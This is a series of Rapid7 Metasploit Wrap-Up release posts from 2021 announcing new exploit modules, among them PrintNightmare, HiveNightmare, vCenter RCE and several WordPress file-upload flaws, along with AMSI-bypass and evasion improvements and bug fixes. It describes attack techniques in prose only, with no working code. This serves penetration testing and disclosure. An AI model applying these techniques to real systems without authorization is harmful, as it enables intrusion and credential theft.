#15535 from adfoster-r7 – The psexec module has been updated to use the SMBSHARE option name instead of SHARE for better consistency across modules. Users can still use the old SHARE option if needed, however this should be considered deprecated.

Bugs fixed

#15524 from pingport80 – This fixes a localization-related issue in the post/linux/gather/enum_network module, caused by it searching for language-specific strings in the output to determine success.
#15534 from timwr – Fixes a regression issue in post/multi/manage/shell_to_meterpreter where the generated Powershell command length was greater than the limit of 8192 characters after string obfuscation was applied.
#15536 from zeroSteiner – The HiveNightmare module has been updated to correctly use the INTERATIONS option instead of the NBRE_ITER option when performing the loop to call check_path(). This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.
#15542 from adfoster-r7 – This fixes a regression with Meterpreter’s initialize methods, which caused Meterpreter scripts to be broken.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up

2021-08-06 Matthew Kienow

Post Syndicated from Matthew Kienow original https://blog.rapid7.com/2021/08/06/metasploit-wrap-up-124/

Desert heat (not the 1999 film)

Metasploit Wrap-Up

This week was more quiet than normal with Black Hat USA and DEF CON, but that didn’t stop the team from delivering some small enhancements and bug fixes! We are also excited to see two new modules #15519 and #15520 from researcher Jacob Baines’ DEF CON talk Bring Your Own Print Driver Vulnerability already appear in the PR queue. Keep an eye out for those modules in the near future!

Our very own Simon Janusz enhanced the CommandDispatcher and SessionManager to support using a negative ID with both the jobs and sessions commands. Quickly access the last job or session by passing -1 to the command. The change allows users to upgrade the most recently opened session to meterpreter using the command sessions -u -1, thus removing the need to run the post/multi/manage/shell_to_meterpreter module.

In addition, our very own Alan David Foster updated the PostgreSQL scanner/postgres/postgres_schemadump module so that it does not ignore the default postgres database. That default database might contain valuable information after all! The enhancements also introduce a new datastore option, IGNORED_DATABASES, to configure a list of databases ignored during the schema dump.

Enhancements and features

#15492 from sjanusz-r7 – Adds support for negative session and job ids.
#15498 from adfoster-r7 – Updates the PostgreSQL schema_dump module to no longer ignore the default postgres database which may contain useful information, and adds a new datastore option to configure ignored databases.

Bugs fixed

#15500 from agalway-r7 – Fixes a regression issue for gitlab_file_read_rce and cacti_filter_sqli_rce where the modules failed to run
#15503 from jheysel-r7 – A bug has been fixed in the Cisco Hyperflex file upload RCE module that prevented it from properly deleting the uploaded payload files. Uploaded payload files should now be properly deleted.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-07-30 Christophe De La Fuente

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2021/07/30/metasploit-wrap-up-123/

New Olympic Discipline: Hive Hunting

Metasploit Wrap-Up

This week, community contributor Hakyac added a new Olympic discipline to Metasploit exploit sport category, which is based on the work of community security researchers @jonasLyk and Kevin Beaumont). The rules are simple: You need to abuse a flaw in Windows 10 and 11 configuration to pass through the defense and access Security Account Manager (SAM) files. Any local unprivileged player is able to read this sensitive security information, such as hashes of user/admin passwords. The best strategy to win a gold medal is to start abusing Windows Volume Shadow Copy Service (VSS) to access these files and copy them locally. Finally, you just need to dump the NTLM hashes, use them in a pass-the-hash attack and score with a remote code execution.

Note that Microsoft issued an out-of-band advisory and tracked this vulnerability as CVE-2021-36934. You can find more information about the rules in this blog post. Happy Hive hunting!

Gold Medal for NetGear R7000 in Swimming 100m Heap Overflow

Our own Grant Willcox added a new exploit module that won the Swimming 100m Heap Overflow discipline. It took advantage of a flaw in genie.cgi?backup.cgi page of Netgear R7000 routers to enable a telnet server and easily got code execution as the root user. Note that, whereas firmware versions 1.0.11.116 and prior are vulnerable, this module can only be used with versions 1.0.11.116 at the moment. The check method can still be used to detect if older devices are vulnerable. This module is based on research done by @colorlight2019. A new gold medal for the Metasploit team, great job!

New module content (5)

Netgear R7000 backup.cgi Heap Overflow RCE by Grant Willcox, SSD Disclosure, and colorlight2019, which exploits CVE-2021-31802 – This adds an module that will leverage CVE-2021-31802 which is an unauthenticated RCE in Netgear R7000 routers. The vulnerability is leveraged to execute a shellcode stub that will enable telnet which can then be accessed for root privileges on the affected device.
Pi-Hole Remove Commands Linux Priv Esc by Emanuele Barbeno and h00die, which exploits CVE-2021-29449 – This adds a local privilege escalation module that targets Pi-Hole versions >= 3.0 and <= 5.2.4. In vulnerable versions of the software, a user with sudo privileges can escalate to root by passing shell commands to either the removecustomcname, removecustomdns, or removestaticdhcp function. The functions have minimal sanitization, and they pass the input to the sed command. By default, the www-data user is permitted to run sudo without supplying a password as configured in the sudoers.d/pihole file.
WordPress Plugin Modern Events Calendar – Authenticated Remote Code Execution by Nguyen Van Khanh, Ron Jost, and Yann Castel, which exploits CVE-2021-24145 – This adds a module that exploits an authenticated file upload vulnerability in the WordPress plugin known as Modern Events Calendar. For versions before 5.16.5, an administrative user can upload a php payload via the calendar import feature by setting the content type of the file to text/csv. Code execution with the privileges of the user running the server is achieved by sending a request for the uploaded file.
WordPress Plugin SP Project and Document – Authenticated Remote Code Execution by Ron Jost and Yann Castel, which exploits CVE-2021-24347 – This adds a module that exploits an authenticated file upload vulnerability in the WordPress plugin, SP Project and Document Manager. For versions below 4.22, an authenticated user can upload arbitrary PHP code because the security check only blocks the upload of files with a .php extension, meaning that uploading a file with a .pHp extension is allowed. Once uploaded, requesting the file will result in code execution as the www-data user.
Windows SAM secrets leak – HiveNightmare by Kevin Beaumont, Yann Castel, and romarroca, which exploits CVE-2021-36934 – This adds a new exploit module that exploits a configuration issue in Windows 10 (from version 1809) and 11, identified as CVE-2021-36934. Due to permission issues, any local user is able to read SAM and SYSTEM hives. This module abuses Windows Volume Shadow Copy Service (VSS) to access these files and save them locally.

Enhancements and features

#15444 from pingport80 – This adds additional support for Powershell sessions to some methods in the File mixin leveraged by post modules.
#15465 from sjanusz-r7 – Updates the local exploit suggester to gracefully handle modules raising unintended exceptions and nil target information

Bugs fixed

#15359 from stephenbradshaw – Fixes a bug in the ssh_login_pubkey which would crash out when not connected to the db
#15460 from pingport80 – This fixes a localization-related issue in the File libraries copy_file method caused by it searching for a word in the output to determine success.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up

2021-07-23 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/

Metasploit Wrap-Up

Now I Control Your Resource Planning Servers

Sage X3 is a resource planning product designed by Sage Group which is designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well wait no more, as thanks to the work of Aaron Herndon, Jonathan Peterson, William Vu, Cale Black, and Ryan Villarreal along with work from community contributor deadjakk, Metasploit now has an exploit module for CVE-2020-7388 and CVE-2020-7387, to allow unauthenticated attackers to gain SYSTEM level code execution on affected versions of Sage X3. This module should prove very useful on engagements both as a way to gain an initial foothold in a target network, as well as a way to elevate privileges to allow for more effective pivoting throughout the target network. More information on these vulnerabilities can be found in our detailed writeup post on our blog.

Help My Server is Raining Keys

Another great module that landed this week was an exploit for CVE-2021-27850 from Johannes Mortiz and Yann Castel aka Hakyac, which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications as it is often used to sign important data within the application. However in the case of Apache Tapestry, one can actually take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadgets such as CommonBeansUtil1 from ysoserial. Therefore this should be one to keep an eye out for and patch if you haven’t already.

PrintNightmare Improvements

Improvements have been made to the PrintNightmare module thanks to Spencer McIntyre to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the \??\UNC\ bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit’s DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet. These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.

New module content (4)

Apache Tapestry HMAC secret key leak by Johannes Moritz and Hakyac, which exploits CVE-2021-27850 – This adds an auxiliary module that retrieves the secret HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. Retrieving this key will allow an attacker to sign objects in order to exploit a separate Java deserialization vulnerability in Apache Tapestry.
Sage X3 AdxAdmin Login Scanner by Jonathan Peterson – Added a Sage X3 login scanner.
WordPress Plugin Backup Guard – Authenticated Remote Code Execution by Nguyen Van Khanh, Ron Jost, and Hakyac, which exploits CVE-2021-24155 – This adds a module that exploits an authenticated file upload vulnerability in the WordPress plugin, Backup Guard. For versions below v1.6.0, the plugin permits the upload of arbitrary php code due to insufficient checks on the file format. Once the file is uploaded, code execution can be achieved by requesting the file, located under the /wp-content/uploads/backup-guard directory.
Sage X3 Administration Service Authentication Bypass Command Execution by Aaron Herndon and Jonathan Peterson, which exploits CVE-2020-7388– Added an exploit for CVE-2020-7387 + CVE-2020-7388.

Enhancements and features

#15403 from pingport80 – This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.
#15409 from zeroSteiner – An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not and to now automatically converts UNC paths to use the \??\UNC\host\path\to\dll format to bypass the second and most recent patch at the time of writing. Additionally a bug was fixed in the DCERPC library where data that was read would be incomplete when the response would not fit into a single fragment to ensure that the PrintNightmare module can now read long responses from the target such as when enumerating the installed printer drivers.
#15440 from bwatters-r7 – This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

Bugs fixed

#14683 from gwillcox-r7 – This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.
#15436 from sjanusz-r7 – Ensure that generated variable names aren’t Java keywords
#15443 from dwelch-r7 – Adds python3 support for the wmiexec external module auxiliary/scanner/smb/impacket/wmiexec
#15445 from zeroSteiner – Updates msfconsole’s output logs to only show the target’s ip when an exploit module is run, rather than a host-hash

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-07-16 Alan David Foster

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/

Eternal Blue improvements

Metasploit Wrap-Up

Prior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate ms17_010_eternalblue_win8 Python module would target Windows 8 and above.

Now Metasploit provides a single Ruby exploit module exploits/windows/smb/ms17_010_eternalblue.rb which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.

AmSi 0BfuSc@t!on

The Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such technique is integrated directly into Metasploit, the stub itself is identified as malicious. A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload from executing. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as amsiInitFailed as well as shuffles the placement of powershell expressions. With these improvements in place, Powershell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting Powershell::prepend_protections_bypass to false.

VMware vCenter Server RCE

Our very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the module documentation.

New module content (4)

VMware vCenter Server Virtual SAN Health Check Plugin RCE by wvu and Ricter Z, which exploits CVE-2021-21985 – A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user.
Polkit D-Bus Authentication Bypass by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits CVE-2021-3560 – A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with root permissions, which can then be used to gain a shell as root. Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain a SSH session first before exploiting this vulnerability.
ForgeRock / OpenAM Jato Java Deserialization by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits CVE-2021-35464 – A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability
in OpenAM and ForgeRock AM. Succcessful exploitation allows for remote code execution as the user running the OpenAM service.
Windows Process Memory Dump by smashery – This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and delete the temporary file on the target.

Enhancements and features

#15217 from agalway-r7 – Removes the Python module ms17_010_eternalblue_win8.py and consolidates the functionality into exploits/windows/smb/ms17_010_eternalblue.rb – which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.
#15254 from zeroSteiner – This updates the AMSI bypass used by modules executing Powershell code to be randomized making it more difficult to be detected using static signatures.

Bugs fixed

#15362 from bwatters-r7 – Fixes a regression issue with post/multi/manage/shell_to_meterpreter, and other interactions with command shell based sessions
#15420 from adfoster-r7 – Fixes an regression issue were auxiliary/scanner/ssh/eaton_xpert_backdoor failed to load correctly

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-up

2021-07-09 Christopher Granleese

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/

PrintNightmare

Metasploit Wrap-up

Rapid7 security researchers Christophe De La Fuente, and Spencer McIntyre, have added a new module for CVE-2021-34527, dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\SYSTEM.

Because Metasploit’s SMB server doesn’t support SMB3 (yet), it’s highly recommended to use an external SMB server like Samba that supports SMB3. The Metasploit module documentation details the process of generating a payload DLL and using this module to load it.

CVE-2021-34527 is being actively exploited in the wild. For more information and a full timeline, see Rapid7’s blog on PrintNightmare!

NSClient++

Great work by community contributor Yann Castel on their new NSClient++ module. This module allows an attacker with an unprivileged windows account to gain admin access on a windows system and start a shell.

For this module to work, both the web interface of NSClient++ and the ExternalScripts feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.

New module content (2)

Print Spooler Remote DLL Injection by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits CVE-2021-34527 – A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the SYSTEM user.
NSClient++ 0.5.2.35 – Privilege escalation by BZYO, Yann Castel and kindredsec – This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScriptsfeature enabled, gains a SYSTEM shell.

Enhancements and features

#15366 from pingport80 – This updates how the msfconsole’s history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).

Bugs fixed

#15320 from agalway-r7 – A bug has been fixed in the read_file method of lib/msf/core/post/file.rb that prevented PowerShell sessions from being able to use the read_file() method. PowerShell sessions should now be able to use this method to read files from the target system.
#15371 from bcoles – This fixes an issue in the apport_abrt_chroot_priv_esc module where if the apport-cli binary was not in the PATH the check method would fail.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from

GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the

binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-07-02 Brendan Watters

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2021/07/02/metasploit-wrap-up-119/

Containers that fail to Contain

Metasploit Wrap-Up

Our own Christophe De La Fuente added a module for CVE-2019-5736 based on the work of Adam Iwaniuk that breaks out of a Docker container by overwriting the runc binary of an image which is run in the user context whenever someone outside the container runs docker exec to make a request of the container.

Execute an Image Please, WordPress

Community contributor Alexandre Zanni sent us a PR that uses native PHP functions to upload a file as an image attachment to WordPress installations running the wpDiscuz plugin, then executes it by requesting the path of the uploaded file.

New module content (2)

Docker Container Escape Via runC Overwrite by Adam Iwaniuk, Borys Popławski, Christophe De La Fuente, Nick Frichette, and Spencer McIntyre, which exploits CVE-2019-5736 – This adds an exploit for CVE-2019-5736 which is a flaw in Docker that can be leveraged by an attacker to overwrite the runc binary in the host and escape from a container.
WordPress wpDiscuz Unauthenticated File Upload Vulnerability by Chloe Chamberland and Hoa Nguyen – SunCSR, which exploits CVE-2020-24186 – This adds an exploit module that targets versions >= v7.0.0 and <= v7.0.4 of the WordPress plugin, wpDiscuz. An unauthenticated user has the ability to upload arbitrary files as image attachments through the wpDiscuz plugin due to the PHP functions used to process the attachments. Once uploaded, unauthenticated code execution is achieved by requesting the path of the file uploaded.

Enhancements and features

#15363 from HynekPetrak – Enhances the auxiliary/scanner/ipmi/ipmi_dumphashes module to have SESSION_RETRY_DELAY and SESSION_MAX_ATTEMPTS options

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-06-25 Shelby Pace

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2021/06/25/metasploit-wrap-up-118/

Cisco ‘Sploits

Metasploit Wrap-Up

This week’s Metasploit Framework release brings two modules that target Cisco products.The first module, written by our very own jheysel-r7, targets an unauthenticated file upload vulnerability in Cisco HyperFlex HX Data Platform. Vulnerable versions of the Cisco HyperFlex software permit uploading of files through the /upload endpoint due to a missing authentication requirement. The exploit module uploads a jsp web shell and obtains code execution as the Tomcat user.

Community contributor Hakyac wrote the second module that targets Cisco Data Center Network Manager (DCNM). The module, auxiliary/admin/networking/cisco_dcnm_auth_bypass, leverages a static encryption key in the REST API of DCNM to generate a valid session token that is then used to create an administrative account with high privileges and access to sensitive data.

rConfig Authenticated File Upload RCE

Community contributor Hakyac wrote another exploit module that targets network management software. exploit/linux/http/rconfig_vendors_auth_file_upload_rce uses an authenticated file upload vulnerability to achieve remote code execution against vulnerable rConfig installations, specifically versions 3.9.6 and below. The vendor logo functionality in lib/crud/vendors.crud.php allows an authenticated user to upload images; however, there are no checks on the contents of the uploaded file. Because of this, an authenticated attacker can upload a php shell and trigger its execution via a request to the file’s name in the /images/vendor path.

New module content (3)

Cisco DCNM auth bypass by mr_me and Yann Castel, which exploits CVE-2019-15975 – This adds a module that leverages CVE-2019-15975 which is an authentication bypass in Cisco’s DCNM platform. The module will leverage the vulnerability to add a new administrative user account with known credentials that can be used to access the system.
Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499) by wvu, Mikhail Klyuchnikov, Nikita Abramov, and jheysel-r7, which exploits
CVE-2021-1499 – This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.
rConfig Vendors Auth File Upload RCE by Murat Şeker, Vishwaraj Bhattrai, and Yann Castel – This adds an exploit module for rConfig versions <= 3.9.6. An arbitrary file upload vulnerability exists in lib/crud/vendors.crud.php through the vendorLogo parameter. The functionality for uploading vendor logos does not validate the contents of uploaded files, so an authenticated user has the capability of uploading arbitrary php code. Once uploaded, code execution on the server can be achieved by requesting the uploaded php file in the images/vendor path.

Enhancements and features

#15358 from zeroSteiner – This updates the exploit/multi/ssh/sshexec module to now account for cases where the target system does not have the python binary. Using the new binary_exists() class method in lib/msf/base/sessions/command_shell.rb, the module now checks for and uses the valid Python binary found on the target system despite not having a fully-established session.

Bugs fixed

#15350 from pingport80 – Fixes a regression issue in the windows/manage/shellcode_inject module which crashed due to a missing mixin
#15352 from adfoster-r7 – Fixes an issue where running msfdb init on an already initialised database would generate a new password instead of just starting the database

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-06-18 Adam Galway

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/06/18/metasploit-wrap-up-117/

I’m very Emby-ous

Metasploit Wrap-Up

Community contributor btnz-k has authored a new Emby Version Scanner module consisting of both an exploit and a scanner for the SSRF vulnerability found in Emby. Emby is a previously open source media server designed to organize, play, and stream audio and video to a variety of devices.

SharePoint of entry

SharePoint, a document management and storage system designed to integrate with Microsoft Office, patched a vuln in May 2021 that allowed authenticated users to perform Remote Code Execution. Our own Spencer McIntyre and wvu authored a PR that allows exploitation of this vulnerability on unpatched systems. The user will need to have the SPBasePermissions.ManageLists permission on the targeted site, but by default users can manually make their own site where that permission will be present.

New module content (4)

Emby Version Scanner by Btnz, which exploits CVE-2020-26948 – This PR adds an aux scanner and module to exploit CVE-2020-26948, an SSRF against emby servers
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE by Grant Willcox and Mücahit Saratar, which exploits CVE-2021-33393 – A new module has been added to exploit CVE-2021-33393, an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior. Successful exploitation results in remote code execution as the root user.
HashiCorp Nomad Remote Command Execution by Wyatt Dahlenburg ( – Adds a new multi/misc/nomad_exec module for HashiCorp’s Nomad product. This module supports the use of the ‘raw_exec’ and ‘exec’ drivers to create a job that spawns a shell.
Microsoft SharePoint Unsafe Control and ViewState RCE by wvu, Spencer McIntyre, and Unknown, which exploits ZDI-21-573 – A new exploit for CVE-2021-31181 has been added, which exploits a RCE in SharePoint that was patched in May 2021. Successful exploitation requires the attacker to have login credentials for a SharePoint user who has SPBasePermissions.ManageLists permissions on any SharePoint site, and grants the attacker remote code execution as the user running the SharePoint server.

Enhancements and features

#15109 from zeroSteiner – An update has been made so that when a user attempts to load an extension that isn’t available for the current Meterpreter type, they will now receive a list of payloads that would yield a Meterpreter session that would be capable of loading the specified extension. Additionally, when a user runs a command that’s in an extension that hasn’t been loaded yet, Metasploit will now tell the user which extension needs to be loaded for the command to run.
#15187 from dwelch-r7 – Updates the msfdb script to now prompt the user before enabling the remote http webservice functionality, defaulting to being disabled. It is still possible to enable this functionality after the fact with msfdb --component webservice init
#15316 from zeroSteiner – The assembly stub used by the PrependFork option for Linux payloads has been updated to call setsid(2) in the child process to properly run the payload in the background before calling fork(2) again. This ensures the payload properly runs when the target environment is expecting the command or payload to return, and ensures the payloads better emulate the Mettle payload’s background command to ensure better consistency across payloads.

Bugs fixed

#15319 from pingport80 – This fixes a localization issue in the post/windows/gather/enum_hyperv_vms module where on non-English systems the error message would not match the specified regular expression.
#15328 from zeroSteiner – The lib/msf/core/session/provider/single_command_shell.rb library has been updated to address an issue whereby shell_read_until_token may sometimes fail to return output if the randomized token being used to delimit output is contained within the legitimate output as well.
#15337 from 0xShoreditch – A bug has been fixed in apache_activemq_upload_jsp.rb whereby the URI and filesystem path were not separated appropriately. Additionally, extra checks were added to handle error conditions that may arise during module operation.
#15340 from adfoster-r7 – A bug was identified in lib/msf/ui/console/command_dispatcher/db.rb where the -d flag was not being correctly honored, preventing users from being able to delete hosts from their database. This has now been fixed.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-03-05 Spencer McIntyre

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/03/05/metasploit-wrap-up-101/

FortiOS Path Traversal

Metasploit Wrap-Up

Returning community contributor mekhalleh submitted a module targeting a path traversal vulnerability within the SSL VPN web portal in multiple versions of FortiOS. The flaw is leveraged to read the usernames and passwords of currently logged in users which are stored in plaintext on the file system. This vulnerability is identified as CVE-2018-13379 and can be reliably exploited remotely, without any authentication. Despite the fact that the vulnerability is several years old, CVE-2018-13379 is still known to be exploited in the wild, including in state-sponsored attacks targeting U.S. government agencies and infrastructure.

Additional Module Updates

Two modules received improvements to their targeting capabilities. The ever-popular exploit for MS17-010 was updated by zerosum0x0 (one of the original authors) with an updated fingerprint for properly targeting Windows Storage Server 2008. This allows the exploit module to be used against affected versions of that Server 2008 variant. Additionally, a KarjaSoft Sami FTP exploit was updated by long-time community contributor bcoles who made a number of improvements to it but notably updated the exploit to only rely on an offset within a DLL that is distributed with the vulnerable software. When memory corruption exploits need the address of a POP, POP, RET instruction (as this one does for the SEH overwrite), they are more reliable when referencing one that is distributed with the software and won’t change, unlike libraries that come with the host operating system and are regularly updated.

New Modules (1)

FortiOS Path Traversal Credential Gatherer by lynx (Carlos Vieira) and mekhalleh (RAMELLA Sébastien), which exploits a directory traversal vulnerability (CVE-2018-13379) in the SSL VPN web portal of FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 to grab the /dev/cmdb/sslvpn_websession file, containing the plaintext list of currently connected usernames and their associated passwords. These credentials can then be saved to the creds database for use in future attacks.

Enhancements and features

#14783 from bcoles The KarjaSoft Sami FTP Server v2.0.2 USER Overflow module has been updated with documentation, RuboCop updates, support for the AutoCheck mixin to automatically check if a target is vulnerable, an updated list of authors, as well as improvements to its exploit strategy that allow it to use only one offset within a DLL shipped with the target for exploitation, instead of relying on an Windows OS DLL whose offsets could change as the OS was updated.
#14838 from zerosum0x0 The psexec_ms17_010.rb library has been updated to support additionally fingerprinting Windows Storage Server 2008 R2 targets as potentially exploitable targets, thereby allowing users to exploit Windows Storage Server 2008 R2 targets vulnerable to MS17-010.

Bugs Fixed

#14816 from dwelch-r7 Ensures that the Faker library is always available for use within modules when generating fake data for bypassing WAF etc.
#14821 from space-r7 The search command within Meterpreter has had its logic updated to support searches that start at the root directory, aka /. These types of searches were previously not returning any results due to a logic bug within the code, which has now been fixed.
#14840 from dwelch-r7 Removes require rex/ui statement that prevented execution of msfrpc.
#14843 from dwelch-r7 With the upgrade to zeitwerk in Metasploit, PseudoShell was not being picked up appropriately, resulting in some modules and tools not being able to load it when needed. A fix has now been applied to make sure that PseudoShell can be appropriately loaded by zeitwerk to prevent missing dependency issues.
#14853 from adfoster-r7 Fixes an edge case when upgrading from an older version of Metasploit to Metasploit 6.0.32 when using the Mac Metasploit Omnibus installer directly or indirectly via Brew

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-02-26 Jeffrey Martin

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/02/26/metasploit-wrap-up-100/

Hey who finked about Flink?

Metasploit Wrap-Up

In this week’s round of modules, contributor bcoles offered up two modules to leverage that Apache Flink install you found in some fun new ways. If you are just looking to filch a few files, auxiliary/scanner/http/apache_flink_jobmanager_traversal leverages CVE-2020-17519 to pilfer the filesystem on Flink versions 1.11.0 thru 1.11.2. The second module, for a litte extra fun, exploit/multi/http/apache_flink_jar_upload_exec utilizes the job functionality in Flink to run arbitrary java code as the web server user, turns out there is a meterpreter for that!

RDP: a dream and a nightmare for the sysAdmin near you.

Ever wonder if exposing a remote desktop in a web page was a good idea? I mean, it’s just a web server, the internet loves those. Turns out timing attacks can expose your usernames when someone chooses to pay close attention. A recently contributed module auxiliary/scanner/http/rdp_web_login contributed by Matthew Dunn can even pay attention for you. Using the module you can now enumerate users by setting a few options.

Have you heard of herpaderping?

For those that have, Metasploit now has a new toy for you. Christophe De La Fuente built on some great research by Johnny Shaw, to bring this technique to Metasploit. Using the new evasion/windows/process_herpaderping module, you too can generate Windows PE files that hide the code behind the curtain, if you will, when executed on a target.

Join the community.

For anyone interested in working with Metasploit in this year’s Google Summer of Code, you’ll have to wait until March 9th to find out if we’ve been accepted as mentors. However, you can get a head start by checking out our current project shortlist. Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!

New Modules (4)

